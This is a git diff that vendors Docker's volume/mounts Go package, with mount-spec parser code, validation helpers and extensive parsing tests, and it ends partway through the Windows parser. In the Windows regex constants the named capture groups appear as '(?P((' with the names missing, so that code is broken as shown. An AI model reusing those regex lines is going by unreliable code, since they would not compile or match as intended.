"github.com/docker/docker/api/types/mount" +) + +const ( + // OSLinux is the same as runtime.GOOS on linux + OSLinux = "linux" + // OSWindows is the same as runtime.GOOS on windows + OSWindows = "windows" +) + +// ErrVolumeTargetIsRoot is returned when the target destination is root. +// It's used by both LCOW and Linux parsers. 
+var ErrVolumeTargetIsRoot = errors.New("invalid specification: destination can't be '/'") + +// Parser represents a platform specific parser for mount expressions +type Parser interface { + ParseMountRaw(raw, volumeDriver string) (*MountPoint, error) + ParseMountSpec(cfg mount.Mount) (*MountPoint, error) + ParseVolumesFrom(spec string) (string, string, error) + DefaultPropagationMode() mount.Propagation + ConvertTmpfsOptions(opt *mount.TmpfsOptions, readOnly bool) (string, error) + DefaultCopyMode() bool + ValidateVolumeName(name string) error + ReadWrite(mode string) bool + IsBackwardCompatible(m *MountPoint) bool + HasResource(m *MountPoint, absPath string) bool + ValidateTmpfsMountDestination(dest string) error + ValidateMountConfig(mt *mount.Mount) error +} + +// NewParser creates a parser for a given container OS, depending on the current host OS (linux on a windows host will resolve to an lcowParser) +func NewParser(containerOS string) Parser { + switch containerOS { + case OSWindows: + return &windowsParser{} + } + if runtime.GOOS == OSWindows { + return &lcowParser{} + } + return &linuxParser{} +} diff --git a/vendor/github.com/docker/docker/volume/mounts/parser_test.go b/vendor/github.com/docker/docker/volume/mounts/parser_test.go new file mode 100644 index 0000000000..347f7d9c4d --- /dev/null +++ b/vendor/github.com/docker/docker/volume/mounts/parser_test.go @@ -0,0 +1,480 @@ +package mounts // import "github.com/docker/docker/volume/mounts" + +import ( + "io/ioutil" + "os" + "runtime" + "strings" + "testing" + + "github.com/docker/docker/api/types/mount" +) + +type parseMountRawTestSet struct { + valid []string + invalid map[string]string +} + +func TestConvertTmpfsOptions(t *testing.T) { + type testCase struct { + opt mount.TmpfsOptions + readOnly bool + expectedSubstrings []string + unexpectedSubstrings []string + } + cases := []testCase{ + { + opt: mount.TmpfsOptions{SizeBytes: 1024 * 1024, Mode: 0700}, + readOnly: false, + expectedSubstrings: 
[]string{"size=1m", "mode=700"}, + unexpectedSubstrings: []string{"ro"}, + }, + { + opt: mount.TmpfsOptions{}, + readOnly: true, + expectedSubstrings: []string{"ro"}, + unexpectedSubstrings: []string{}, + }, + } + p := &linuxParser{} + for _, c := range cases { + data, err := p.ConvertTmpfsOptions(&c.opt, c.readOnly) + if err != nil { + t.Fatalf("could not convert %+v (readOnly: %v) to string: %v", + c.opt, c.readOnly, err) + } + t.Logf("data=%q", data) + for _, s := range c.expectedSubstrings { + if !strings.Contains(data, s) { + t.Fatalf("expected substring: %s, got %v (case=%+v)", s, data, c) + } + } + for _, s := range c.unexpectedSubstrings { + if strings.Contains(data, s) { + t.Fatalf("unexpected substring: %s, got %v (case=%+v)", s, data, c) + } + } + } +} + +type mockFiProvider struct{} + +func (mockFiProvider) fileInfo(path string) (exists, isDir bool, err error) { + dirs := map[string]struct{}{ + `c:\`: {}, + `c:\windows\`: {}, + `c:\windows`: {}, + `c:\program files`: {}, + `c:\Windows`: {}, + `c:\Program Files (x86)`: {}, + `\\?\c:\windows\`: {}, + } + files := map[string]struct{}{ + `c:\windows\system32\ntdll.dll`: {}, + } + if _, ok := dirs[path]; ok { + return true, true, nil + } + if _, ok := files[path]; ok { + return true, false, nil + } + return false, false, nil +} + +func TestParseMountRaw(t *testing.T) { + + previousProvider := currentFileInfoProvider + defer func() { currentFileInfoProvider = previousProvider }() + currentFileInfoProvider = mockFiProvider{} + windowsSet := parseMountRawTestSet{ + valid: []string{ + `d:\`, + `d:`, + `d:\path`, + `d:\path with space`, + `c:\:d:\`, + `c:\windows\:d:`, + `c:\windows:d:\s p a c e`, + `c:\windows:d:\s p a c e:RW`, + `c:\program files:d:\s p a c e i n h o s t d i r`, + `0123456789name:d:`, + `MiXeDcAsEnAmE:d:`, + `name:D:`, + `name:D::rW`, + `name:D::RW`, + `name:D::RO`, + `c:/:d:/forward/slashes/are/good/too`, + `c:/:d:/including with/spaces:ro`, + `c:\Windows`, // With capital + `c:\Program Files 
(x86)`, // With capitals and brackets + `\\?\c:\windows\:d:`, // Long path handling (source) + `c:\windows\:\\?\d:\`, // Long path handling (target) + `\\.\pipe\foo:\\.\pipe\foo`, // named pipe + `//./pipe/foo://./pipe/foo`, // named pipe forward slashes + }, + invalid: map[string]string{ + ``: "invalid volume specification: ", + `.`: "invalid volume specification: ", + `..\`: "invalid volume specification: ", + `c:\:..\`: "invalid volume specification: ", + `c:\:d:\:xyzzy`: "invalid volume specification: ", + `c:`: "cannot be `c:`", + `c:\`: "cannot be `c:`", + `c:\notexist:d:`: `bind mount source path does not exist: c:\notexist`, + `c:\windows\system32\ntdll.dll:d:`: `source path must be a directory`, + `name<:d:`: `invalid volume specification`, + `name>:d:`: `invalid volume specification`, + `name::d:`: `invalid volume specification`, + `name":d:`: `invalid volume specification`, + `name\:d:`: `invalid volume specification`, + `name*:d:`: `invalid volume specification`, + `name|:d:`: `invalid volume specification`, + `name?:d:`: `invalid volume specification`, + `name/:d:`: `invalid volume specification`, + `d:\pathandmode:rw`: `invalid volume specification`, + `d:\pathandmode:ro`: `invalid volume specification`, + `con:d:`: `cannot be a reserved word for Windows filenames`, + `PRN:d:`: `cannot be a reserved word for Windows filenames`, + `aUx:d:`: `cannot be a reserved word for Windows filenames`, + `nul:d:`: `cannot be a reserved word for Windows filenames`, + `com1:d:`: `cannot be a reserved word for Windows filenames`, + `com2:d:`: `cannot be a reserved word for Windows filenames`, + `com3:d:`: `cannot be a reserved word for Windows filenames`, + `com4:d:`: `cannot be a reserved word for Windows filenames`, + `com5:d:`: `cannot be a reserved word for Windows filenames`, + `com6:d:`: `cannot be a reserved word for Windows filenames`, + `com7:d:`: `cannot be a reserved word for Windows filenames`, + `com8:d:`: `cannot be a reserved word for Windows 
filenames`, + `com9:d:`: `cannot be a reserved word for Windows filenames`, + `lpt1:d:`: `cannot be a reserved word for Windows filenames`, + `lpt2:d:`: `cannot be a reserved word for Windows filenames`, + `lpt3:d:`: `cannot be a reserved word for Windows filenames`, + `lpt4:d:`: `cannot be a reserved word for Windows filenames`, + `lpt5:d:`: `cannot be a reserved word for Windows filenames`, + `lpt6:d:`: `cannot be a reserved word for Windows filenames`, + `lpt7:d:`: `cannot be a reserved word for Windows filenames`, + `lpt8:d:`: `cannot be a reserved word for Windows filenames`, + `lpt9:d:`: `cannot be a reserved word for Windows filenames`, + `c:\windows\system32\ntdll.dll`: `Only directories can be mapped on this platform`, + `\\.\pipe\foo:c:\pipe`: `'c:\pipe' is not a valid pipe path`, + }, + } + lcowSet := parseMountRawTestSet{ + valid: []string{ + `/foo`, + `/foo/`, + `/foo bar`, + `c:\:/foo`, + `c:\windows\:/foo`, + `c:\windows:/s p a c e`, + `c:\windows:/s p a c e:RW`, + `c:\program files:/s p a c e i n h o s t d i r`, + `0123456789name:/foo`, + `MiXeDcAsEnAmE:/foo`, + `name:/foo`, + `name:/foo:rW`, + `name:/foo:RW`, + `name:/foo:RO`, + `c:/:/forward/slashes/are/good/too`, + `c:/:/including with/spaces:ro`, + `/Program Files (x86)`, // With capitals and brackets + }, + invalid: map[string]string{ + ``: "invalid volume specification: ", + `.`: "invalid volume specification: ", + `c:`: "invalid volume specification: ", + `c:\`: "invalid volume specification: ", + `../`: "invalid volume specification: ", + `c:\:../`: "invalid volume specification: ", + `c:\:/foo:xyzzy`: "invalid volume specification: ", + `/`: "destination can't be '/'", + `/..`: "destination can't be '/'", + `c:\notexist:/foo`: `bind mount source path does not exist: c:\notexist`, + `c:\windows\system32\ntdll.dll:/foo`: `source path must be a directory`, + `name<:/foo`: `invalid volume specification`, + `name>:/foo`: `invalid volume specification`, + `name::/foo`: `invalid volume 
specification`, + `name":/foo`: `invalid volume specification`, + `name\:/foo`: `invalid volume specification`, + `name*:/foo`: `invalid volume specification`, + `name|:/foo`: `invalid volume specification`, + `name?:/foo`: `invalid volume specification`, + `name/:/foo`: `invalid volume specification`, + `/foo:rw`: `invalid volume specification`, + `/foo:ro`: `invalid volume specification`, + `con:/foo`: `cannot be a reserved word for Windows filenames`, + `PRN:/foo`: `cannot be a reserved word for Windows filenames`, + `aUx:/foo`: `cannot be a reserved word for Windows filenames`, + `nul:/foo`: `cannot be a reserved word for Windows filenames`, + `com1:/foo`: `cannot be a reserved word for Windows filenames`, + `com2:/foo`: `cannot be a reserved word for Windows filenames`, + `com3:/foo`: `cannot be a reserved word for Windows filenames`, + `com4:/foo`: `cannot be a reserved word for Windows filenames`, + `com5:/foo`: `cannot be a reserved word for Windows filenames`, + `com6:/foo`: `cannot be a reserved word for Windows filenames`, + `com7:/foo`: `cannot be a reserved word for Windows filenames`, + `com8:/foo`: `cannot be a reserved word for Windows filenames`, + `com9:/foo`: `cannot be a reserved word for Windows filenames`, + `lpt1:/foo`: `cannot be a reserved word for Windows filenames`, + `lpt2:/foo`: `cannot be a reserved word for Windows filenames`, + `lpt3:/foo`: `cannot be a reserved word for Windows filenames`, + `lpt4:/foo`: `cannot be a reserved word for Windows filenames`, + `lpt5:/foo`: `cannot be a reserved word for Windows filenames`, + `lpt6:/foo`: `cannot be a reserved word for Windows filenames`, + `lpt7:/foo`: `cannot be a reserved word for Windows filenames`, + `lpt8:/foo`: `cannot be a reserved word for Windows filenames`, + `lpt9:/foo`: `cannot be a reserved word for Windows filenames`, + `\\.\pipe\foo:/foo`: `Linux containers on Windows do not support named pipe mounts`, + }, + } + linuxSet := parseMountRawTestSet{ + valid: []string{ + 
"/home", + "/home:/home", + "/home:/something/else", + "/with space", + "/home:/with space", + "relative:/absolute-path", + "hostPath:/containerPath:ro", + "/hostPath:/containerPath:rw", + "/rw:/ro", + "/hostPath:/containerPath:shared", + "/hostPath:/containerPath:rshared", + "/hostPath:/containerPath:slave", + "/hostPath:/containerPath:rslave", + "/hostPath:/containerPath:private", + "/hostPath:/containerPath:rprivate", + "/hostPath:/containerPath:ro,shared", + "/hostPath:/containerPath:ro,slave", + "/hostPath:/containerPath:ro,private", + "/hostPath:/containerPath:ro,z,shared", + "/hostPath:/containerPath:ro,Z,slave", + "/hostPath:/containerPath:Z,ro,slave", + "/hostPath:/containerPath:slave,Z,ro", + "/hostPath:/containerPath:Z,slave,ro", + "/hostPath:/containerPath:slave,ro,Z", + "/hostPath:/containerPath:rslave,ro,Z", + "/hostPath:/containerPath:ro,rshared,Z", + "/hostPath:/containerPath:ro,Z,rprivate", + }, + invalid: map[string]string{ + "": "invalid volume specification", + "./": "mount path must be absolute", + "../": "mount path must be absolute", + "/:../": "mount path must be absolute", + "/:path": "mount path must be absolute", + ":": "invalid volume specification", + "/tmp:": "invalid volume specification", + ":test": "invalid volume specification", + ":/test": "invalid volume specification", + "tmp:": "invalid volume specification", + ":test:": "invalid volume specification", + "::": "invalid volume specification", + ":::": "invalid volume specification", + "/tmp:::": "invalid volume specification", + ":/tmp::": "invalid volume specification", + "/path:rw": "invalid volume specification", + "/path:ro": "invalid volume specification", + "/rw:rw": "invalid volume specification", + "path:ro": "invalid volume specification", + "/path:/path:sw": `invalid mode`, + "/path:/path:rwz": `invalid mode`, + "/path:/path:ro,rshared,rslave": `invalid mode`, + "/path:/path:ro,z,rshared,rslave": `invalid mode`, + "/path:shared": "invalid volume specification", + 
"/path:slave": "invalid volume specification", + "/path:private": "invalid volume specification", + "name:/absolute-path:shared": "invalid volume specification", + "name:/absolute-path:rshared": "invalid volume specification", + "name:/absolute-path:slave": "invalid volume specification", + "name:/absolute-path:rslave": "invalid volume specification", + "name:/absolute-path:private": "invalid volume specification", + "name:/absolute-path:rprivate": "invalid volume specification", + }, + } + + linParser := &linuxParser{} + winParser := &windowsParser{} + lcowParser := &lcowParser{} + tester := func(parser Parser, set parseMountRawTestSet) { + + for _, path := range set.valid { + + if _, err := parser.ParseMountRaw(path, "local"); err != nil { + t.Errorf("ParseMountRaw(`%q`) should succeed: error %q", path, err) + } + } + + for path, expectedError := range set.invalid { + if mp, err := parser.ParseMountRaw(path, "local"); err == nil { + t.Errorf("ParseMountRaw(`%q`) should have failed validation. Err '%v' - MP: %v", path, err, mp) + } else { + if !strings.Contains(err.Error(), expectedError) { + t.Errorf("ParseMountRaw(`%q`) error should contain %q, got %v", path, expectedError, err.Error()) + } + } + } + } + tester(linParser, linuxSet) + tester(winParser, windowsSet) + tester(lcowParser, lcowSet) + +} + +// testParseMountRaw is a structure used by TestParseMountRawSplit for +// specifying test cases for the ParseMountRaw() function. 
+type testParseMountRaw struct { + bind string + driver string + expType mount.Type + expDest string + expSource string + expName string + expDriver string + expRW bool + fail bool +} + +func TestParseMountRawSplit(t *testing.T) { + previousProvider := currentFileInfoProvider + defer func() { currentFileInfoProvider = previousProvider }() + currentFileInfoProvider = mockFiProvider{} + windowsCases := []testParseMountRaw{ + {`c:\:d:`, "local", mount.TypeBind, `d:`, `c:\`, ``, "", true, false}, + {`c:\:d:\`, "local", mount.TypeBind, `d:\`, `c:\`, ``, "", true, false}, + {`c:\:d:\:ro`, "local", mount.TypeBind, `d:\`, `c:\`, ``, "", false, false}, + {`c:\:d:\:rw`, "local", mount.TypeBind, `d:\`, `c:\`, ``, "", true, false}, + {`c:\:d:\:foo`, "local", mount.TypeBind, `d:\`, `c:\`, ``, "", false, true}, + {`name:d::rw`, "local", mount.TypeVolume, `d:`, ``, `name`, "local", true, false}, + {`name:d:`, "local", mount.TypeVolume, `d:`, ``, `name`, "local", true, false}, + {`name:d::ro`, "local", mount.TypeVolume, `d:`, ``, `name`, "local", false, false}, + {`name:c:`, "", mount.TypeVolume, ``, ``, ``, "", true, true}, + {`driver/name:c:`, "", mount.TypeVolume, ``, ``, ``, "", true, true}, + {`\\.\pipe\foo:\\.\pipe\bar`, "local", mount.TypeNamedPipe, `\\.\pipe\bar`, `\\.\pipe\foo`, "", "", true, false}, + {`\\.\pipe\foo:c:\foo\bar`, "local", mount.TypeNamedPipe, ``, ``, "", "", true, true}, + {`c:\foo\bar:\\.\pipe\foo`, "local", mount.TypeNamedPipe, ``, ``, "", "", true, true}, + } + lcowCases := []testParseMountRaw{ + {`c:\:/foo`, "local", mount.TypeBind, `/foo`, `c:\`, ``, "", true, false}, + {`c:\:/foo:ro`, "local", mount.TypeBind, `/foo`, `c:\`, ``, "", false, false}, + {`c:\:/foo:rw`, "local", mount.TypeBind, `/foo`, `c:\`, ``, "", true, false}, + {`c:\:/foo:foo`, "local", mount.TypeBind, `/foo`, `c:\`, ``, "", false, true}, + {`name:/foo:rw`, "local", mount.TypeVolume, `/foo`, ``, `name`, "local", true, false}, + {`name:/foo`, "local", mount.TypeVolume, `/foo`, ``, 
`name`, "local", true, false}, + {`name:/foo:ro`, "local", mount.TypeVolume, `/foo`, ``, `name`, "local", false, false}, + {`name:/`, "", mount.TypeVolume, ``, ``, ``, "", true, true}, + {`driver/name:/`, "", mount.TypeVolume, ``, ``, ``, "", true, true}, + {`\\.\pipe\foo:\\.\pipe\bar`, "local", mount.TypeNamedPipe, `\\.\pipe\bar`, `\\.\pipe\foo`, "", "", true, true}, + {`\\.\pipe\foo:/data`, "local", mount.TypeNamedPipe, ``, ``, "", "", true, true}, + {`c:\foo\bar:\\.\pipe\foo`, "local", mount.TypeNamedPipe, ``, ``, "", "", true, true}, + } + linuxCases := []testParseMountRaw{ + {"/tmp:/tmp1", "", mount.TypeBind, "/tmp1", "/tmp", "", "", true, false}, + {"/tmp:/tmp2:ro", "", mount.TypeBind, "/tmp2", "/tmp", "", "", false, false}, + {"/tmp:/tmp3:rw", "", mount.TypeBind, "/tmp3", "/tmp", "", "", true, false}, + {"/tmp:/tmp4:foo", "", mount.TypeBind, "", "", "", "", false, true}, + {"name:/named1", "", mount.TypeVolume, "/named1", "", "name", "", true, false}, + {"name:/named2", "external", mount.TypeVolume, "/named2", "", "name", "external", true, false}, + {"name:/named3:ro", "local", mount.TypeVolume, "/named3", "", "name", "local", false, false}, + {"local/name:/tmp:rw", "", mount.TypeVolume, "/tmp", "", "local/name", "", true, false}, + {"/tmp:tmp", "", mount.TypeBind, "", "", "", "", true, true}, + } + linParser := &linuxParser{} + winParser := &windowsParser{} + lcowParser := &lcowParser{} + tester := func(parser Parser, cases []testParseMountRaw) { + for i, c := range cases { + t.Logf("case %d", i) + m, err := parser.ParseMountRaw(c.bind, c.driver) + if c.fail { + if err == nil { + t.Errorf("Expected error, was nil, for spec %s\n", c.bind) + } + continue + } + + if m == nil || err != nil { + t.Errorf("ParseMountRaw failed for spec '%s', driver '%s', error '%v'", c.bind, c.driver, err.Error()) + continue + } + + if m.Destination != c.expDest { + t.Errorf("Expected destination '%s, was %s', for spec '%s'", c.expDest, m.Destination, c.bind) + } + + if m.Source 
!= c.expSource { + t.Errorf("Expected source '%s', was '%s', for spec '%s'", c.expSource, m.Source, c.bind) + } + + if m.Name != c.expName { + t.Errorf("Expected name '%s', was '%s' for spec '%s'", c.expName, m.Name, c.bind) + } + + if m.Driver != c.expDriver { + t.Errorf("Expected driver '%s', was '%s', for spec '%s'", c.expDriver, m.Driver, c.bind) + } + + if m.RW != c.expRW { + t.Errorf("Expected RW '%v', was '%v' for spec '%s'", c.expRW, m.RW, c.bind) + } + if m.Type != c.expType { + t.Fatalf("Expected type '%s', was '%s', for spec '%s'", c.expType, m.Type, c.bind) + } + } + } + + tester(linParser, linuxCases) + tester(winParser, windowsCases) + tester(lcowParser, lcowCases) +} + +func TestParseMountSpec(t *testing.T) { + type c struct { + input mount.Mount + expected MountPoint + } + testDir, err := ioutil.TempDir("", "test-mount-config") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(testDir) + parser := NewParser(runtime.GOOS) + cases := []c{ + {mount.Mount{Type: mount.TypeBind, Source: testDir, Target: testDestinationPath, ReadOnly: true}, MountPoint{Type: mount.TypeBind, Source: testDir, Destination: testDestinationPath, Propagation: parser.DefaultPropagationMode()}}, + {mount.Mount{Type: mount.TypeBind, Source: testDir, Target: testDestinationPath}, MountPoint{Type: mount.TypeBind, Source: testDir, Destination: testDestinationPath, RW: true, Propagation: parser.DefaultPropagationMode()}}, + {mount.Mount{Type: mount.TypeBind, Source: testDir + string(os.PathSeparator), Target: testDestinationPath, ReadOnly: true}, MountPoint{Type: mount.TypeBind, Source: testDir, Destination: testDestinationPath, Propagation: parser.DefaultPropagationMode()}}, + {mount.Mount{Type: mount.TypeBind, Source: testDir, Target: testDestinationPath + string(os.PathSeparator), ReadOnly: true}, MountPoint{Type: mount.TypeBind, Source: testDir, Destination: testDestinationPath, Propagation: parser.DefaultPropagationMode()}}, + {mount.Mount{Type: mount.TypeVolume, Target: 
testDestinationPath}, MountPoint{Type: mount.TypeVolume, Destination: testDestinationPath, RW: true, CopyData: parser.DefaultCopyMode()}}, + {mount.Mount{Type: mount.TypeVolume, Target: testDestinationPath + string(os.PathSeparator)}, MountPoint{Type: mount.TypeVolume, Destination: testDestinationPath, RW: true, CopyData: parser.DefaultCopyMode()}}, + } + + for i, c := range cases { + t.Logf("case %d", i) + mp, err := parser.ParseMountSpec(c.input) + if err != nil { + t.Error(err) + } + + if c.expected.Type != mp.Type { + t.Errorf("Expected mount types to match. Expected: '%s', Actual: '%s'", c.expected.Type, mp.Type) + } + if c.expected.Destination != mp.Destination { + t.Errorf("Expected mount destination to match. Expected: '%s', Actual: '%s'", c.expected.Destination, mp.Destination) + } + if c.expected.Source != mp.Source { + t.Errorf("Expected mount source to match. Expected: '%s', Actual: '%s'", c.expected.Source, mp.Source) + } + if c.expected.RW != mp.RW { + t.Errorf("Expected mount writable to match. Expected: '%v', Actual: '%v'", c.expected.RW, mp.RW) + } + if c.expected.Propagation != mp.Propagation { + t.Errorf("Expected mount propagation to match. Expected: '%v', Actual: '%s'", c.expected.Propagation, mp.Propagation) + } + if c.expected.Driver != mp.Driver { + t.Errorf("Expected mount driver to match. Expected: '%v', Actual: '%s'", c.expected.Driver, mp.Driver) + } + if c.expected.CopyData != mp.CopyData { + t.Errorf("Expected mount copy data to match. 
Expected: '%v', Actual: '%v'", c.expected.CopyData, mp.CopyData) + } + } +} diff --git a/vendor/github.com/docker/docker/volume/mounts/validate.go b/vendor/github.com/docker/docker/volume/mounts/validate.go new file mode 100644 index 0000000000..0b71526901 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/mounts/validate.go @@ -0,0 +1,28 @@ +package mounts // import "github.com/docker/docker/volume/mounts" + +import ( + "fmt" + + "github.com/docker/docker/api/types/mount" + "github.com/pkg/errors" +) + +type errMountConfig struct { + mount *mount.Mount + err error +} + +func (e *errMountConfig) Error() string { + return fmt.Sprintf("invalid mount config for type %q: %v", e.mount.Type, e.err.Error()) +} + +func errBindSourceDoesNotExist(path string) error { + return errors.Errorf("bind mount source path does not exist: %s", path) +} + +func errExtraField(name string) error { + return errors.Errorf("field %s must not be specified", name) +} +func errMissingField(name string) error { + return errors.Errorf("field %s must not be empty", name) +} diff --git a/vendor/github.com/docker/docker/volume/mounts/validate_test.go b/vendor/github.com/docker/docker/volume/mounts/validate_test.go new file mode 100644 index 0000000000..4f83856043 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/mounts/validate_test.go @@ -0,0 +1,73 @@ +package mounts // import "github.com/docker/docker/volume/mounts" + +import ( + "errors" + "io/ioutil" + "os" + "runtime" + "strings" + "testing" + + "github.com/docker/docker/api/types/mount" +) + +func TestValidateMount(t *testing.T) { + testDir, err := ioutil.TempDir("", "test-validate-mount") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(testDir) + + cases := []struct { + input mount.Mount + expected error + }{ + {mount.Mount{Type: mount.TypeVolume}, errMissingField("Target")}, + {mount.Mount{Type: mount.TypeVolume, Target: testDestinationPath, Source: "hello"}, nil}, + {mount.Mount{Type: mount.TypeVolume, Target: 
testDestinationPath}, nil}, + {mount.Mount{Type: mount.TypeBind}, errMissingField("Target")}, + {mount.Mount{Type: mount.TypeBind, Target: testDestinationPath}, errMissingField("Source")}, + {mount.Mount{Type: mount.TypeBind, Target: testDestinationPath, Source: testSourcePath, VolumeOptions: &mount.VolumeOptions{}}, errExtraField("VolumeOptions")}, + + {mount.Mount{Type: mount.TypeBind, Source: testDir, Target: testDestinationPath}, nil}, + {mount.Mount{Type: "invalid", Target: testDestinationPath}, errors.New("mount type unknown")}, + {mount.Mount{Type: mount.TypeBind, Source: testSourcePath, Target: testDestinationPath}, errBindSourceDoesNotExist(testSourcePath)}, + } + + lcowCases := []struct { + input mount.Mount + expected error + }{ + {mount.Mount{Type: mount.TypeVolume}, errMissingField("Target")}, + {mount.Mount{Type: mount.TypeVolume, Target: "/foo", Source: "hello"}, nil}, + {mount.Mount{Type: mount.TypeVolume, Target: "/foo"}, nil}, + {mount.Mount{Type: mount.TypeBind}, errMissingField("Target")}, + {mount.Mount{Type: mount.TypeBind, Target: "/foo"}, errMissingField("Source")}, + {mount.Mount{Type: mount.TypeBind, Target: "/foo", Source: "c:\\foo", VolumeOptions: &mount.VolumeOptions{}}, errExtraField("VolumeOptions")}, + {mount.Mount{Type: mount.TypeBind, Source: "c:\\foo", Target: "/foo"}, errBindSourceDoesNotExist("c:\\foo")}, + {mount.Mount{Type: mount.TypeBind, Source: testDir, Target: "/foo"}, nil}, + {mount.Mount{Type: "invalid", Target: "/foo"}, errors.New("mount type unknown")}, + } + parser := NewParser(runtime.GOOS) + for i, x := range cases { + err := parser.ValidateMountConfig(&x.input) + if err == nil && x.expected == nil { + continue + } + if (err == nil && x.expected != nil) || (x.expected == nil && err != nil) || !strings.Contains(err.Error(), x.expected.Error()) { + t.Errorf("expected %q, got %q, case: %d", x.expected, err, i) + } + } + if runtime.GOOS == "windows" { + parser = &lcowParser{} + for i, x := range lcowCases { + err := 
parser.ValidateMountConfig(&x.input) + if err == nil && x.expected == nil { + continue + } + if (err == nil && x.expected != nil) || (x.expected == nil && err != nil) || !strings.Contains(err.Error(), x.expected.Error()) { + t.Errorf("expected %q, got %q, case: %d", x.expected, err, i) + } + } + } +} diff --git a/vendor/github.com/docker/docker/volume/validate_test_unix.go b/vendor/github.com/docker/docker/volume/mounts/validate_unix_test.go similarity index 57% rename from vendor/github.com/docker/docker/volume/validate_test_unix.go rename to vendor/github.com/docker/docker/volume/mounts/validate_unix_test.go index dd1de2f643..a319371451 100644 --- a/vendor/github.com/docker/docker/volume/validate_test_unix.go +++ b/vendor/github.com/docker/docker/volume/mounts/validate_unix_test.go @@ -1,6 +1,6 @@ // +build !windows -package volume +package mounts // import "github.com/docker/docker/volume/mounts" var ( testDestinationPath = "/foo" diff --git a/vendor/github.com/docker/docker/volume/validate_test_windows.go b/vendor/github.com/docker/docker/volume/mounts/validate_windows_test.go similarity index 52% rename from vendor/github.com/docker/docker/volume/validate_test_windows.go rename to vendor/github.com/docker/docker/volume/mounts/validate_windows_test.go index d5f86ac850..74b40a6c30 100644 --- a/vendor/github.com/docker/docker/volume/validate_test_windows.go +++ b/vendor/github.com/docker/docker/volume/mounts/validate_windows_test.go @@ -1,4 +1,4 @@ -package volume +package mounts // import "github.com/docker/docker/volume/mounts" var ( testDestinationPath = `c:\foo` diff --git a/vendor/github.com/docker/docker/volume/volume_copy.go b/vendor/github.com/docker/docker/volume/mounts/volume_copy.go similarity index 73% rename from vendor/github.com/docker/docker/volume/volume_copy.go rename to vendor/github.com/docker/docker/volume/mounts/volume_copy.go index 77f06a0d1f..04056fa50a 100644 --- a/vendor/github.com/docker/docker/volume/volume_copy.go +++ 
b/vendor/github.com/docker/docker/volume/mounts/volume_copy.go @@ -1,4 +1,4 @@ -package volume +package mounts // import "github.com/docker/docker/volume/mounts" import "strings" @@ -13,11 +13,11 @@ func copyModeExists(mode string) bool { } // GetCopyMode gets the copy mode from the mode string for mounts -func getCopyMode(mode string) (bool, bool) { +func getCopyMode(mode string, def bool) (bool, bool) { for _, o := range strings.Split(mode, ",") { if isEnabled, exists := copyModes[o]; exists { return isEnabled, true } } - return DefaultCopyMode, false + return def, false } diff --git a/vendor/github.com/docker/docker/volume/mounts/volume_unix.go b/vendor/github.com/docker/docker/volume/mounts/volume_unix.go new file mode 100644 index 0000000000..c6d51e0710 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/mounts/volume_unix.go @@ -0,0 +1,18 @@ +// +build linux freebsd darwin + +package mounts // import "github.com/docker/docker/volume/mounts" + +import ( + "fmt" + "path/filepath" + "strings" +) + +func (p *linuxParser) HasResource(m *MountPoint, absolutePath string) bool { + relPath, err := filepath.Rel(m.Destination, absolutePath) + return err == nil && relPath != ".." 
&& !strings.HasPrefix(relPath, fmt.Sprintf("..%c", filepath.Separator)) +} + +func (p *windowsParser) HasResource(m *MountPoint, absolutePath string) bool { + return false +} diff --git a/vendor/github.com/docker/docker/volume/mounts/volume_windows.go b/vendor/github.com/docker/docker/volume/mounts/volume_windows.go new file mode 100644 index 0000000000..773e7db88a --- /dev/null +++ b/vendor/github.com/docker/docker/volume/mounts/volume_windows.go @@ -0,0 +1,8 @@ +package mounts // import "github.com/docker/docker/volume/mounts" + +func (p *windowsParser) HasResource(m *MountPoint, absolutePath string) bool { + return false +} +func (p *linuxParser) HasResource(m *MountPoint, absolutePath string) bool { + return false +} diff --git a/vendor/github.com/docker/docker/volume/mounts/windows_parser.go b/vendor/github.com/docker/docker/volume/mounts/windows_parser.go new file mode 100644 index 0000000000..ac61044043 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/mounts/windows_parser.go @@ -0,0 +1,456 @@ +package mounts // import "github.com/docker/docker/volume/mounts" + +import ( + "errors" + "fmt" + "os" + "regexp" + "runtime" + "strings" + + "github.com/docker/docker/api/types/mount" + "github.com/docker/docker/pkg/stringid" +) + +type windowsParser struct { +} + +const ( + // Spec should be in the format [source:]destination[:mode] + // + // Examples: c:\foo bar:d:rw + // c:\foo:d:\bar + // myname:d: + // d:\ + // + // Explanation of this regex! Thanks @thaJeztah on IRC and gist for help. See + // https://gist.github.com/thaJeztah/6185659e4978789fb2b2. A good place to + // test is https://regex-golang.appspot.com/assets/html/index.html + // + // Useful link for referencing named capturing groups: + // http://stackoverflow.com/questions/20750843/using-named-matches-from-go-regex + // + // There are three match groups: source, destination and mode. 
+ // + + // rxHostDir is the first option of a source + rxHostDir = `(?:\\\\\?\\)?[a-z]:[\\/](?:[^\\/:*?"<>|\r\n]+[\\/]?)*` + // rxName is the second option of a source + rxName = `[^\\/:*?"<>|\r\n]+` + + // RXReservedNames are reserved names not possible on Windows + rxReservedNames = `(con)|(prn)|(nul)|(aux)|(com[1-9])|(lpt[1-9])` + + // rxPipe is a named path pipe (starts with `\\.\pipe\`, possibly with / instead of \) + rxPipe = `[/\\]{2}.[/\\]pipe[/\\][^:*?"<>|\r\n]+` + // rxSource is the combined possibilities for a source + rxSource = `((?P((` + rxHostDir + `)|(` + rxName + `)|(` + rxPipe + `))):)?` + + // Source. Can be either a host directory, a name, or omitted: + // HostDir: + // - Essentially using the folder solution from + // https://www.safaribooksonline.com/library/view/regular-expressions-cookbook/9781449327453/ch08s18.html + // but adding case insensitivity. + // - Must be an absolute path such as c:\path + // - Can include spaces such as `c:\program files` + // - And then followed by a colon which is not in the capture group + // - And can be optional + // Name: + // - Must not contain invalid NTFS filename characters (https://msdn.microsoft.com/en-us/library/windows/desktop/aa365247(v=vs.85).aspx) + // - And then followed by a colon which is not in the capture group + // - And can be optional + + // rxDestination is the regex expression for the mount destination + rxDestination = `(?P((?:\\\\\?\\)?([a-z]):((?:[\\/][^\\/:*?"<>\r\n]+)*[\\/]?))|(` + rxPipe + `))` + + rxLCOWDestination = `(?P/(?:[^\\/:*?"<>\r\n]+[/]?)*)` + // Destination (aka container path): + // - Variation on hostdir but can be a drive followed by colon as well + // - If a path, must be absolute. Can include spaces + // - Drive cannot be c: (explicitly checked in code, not RegEx) + + // rxMode is the regex expression 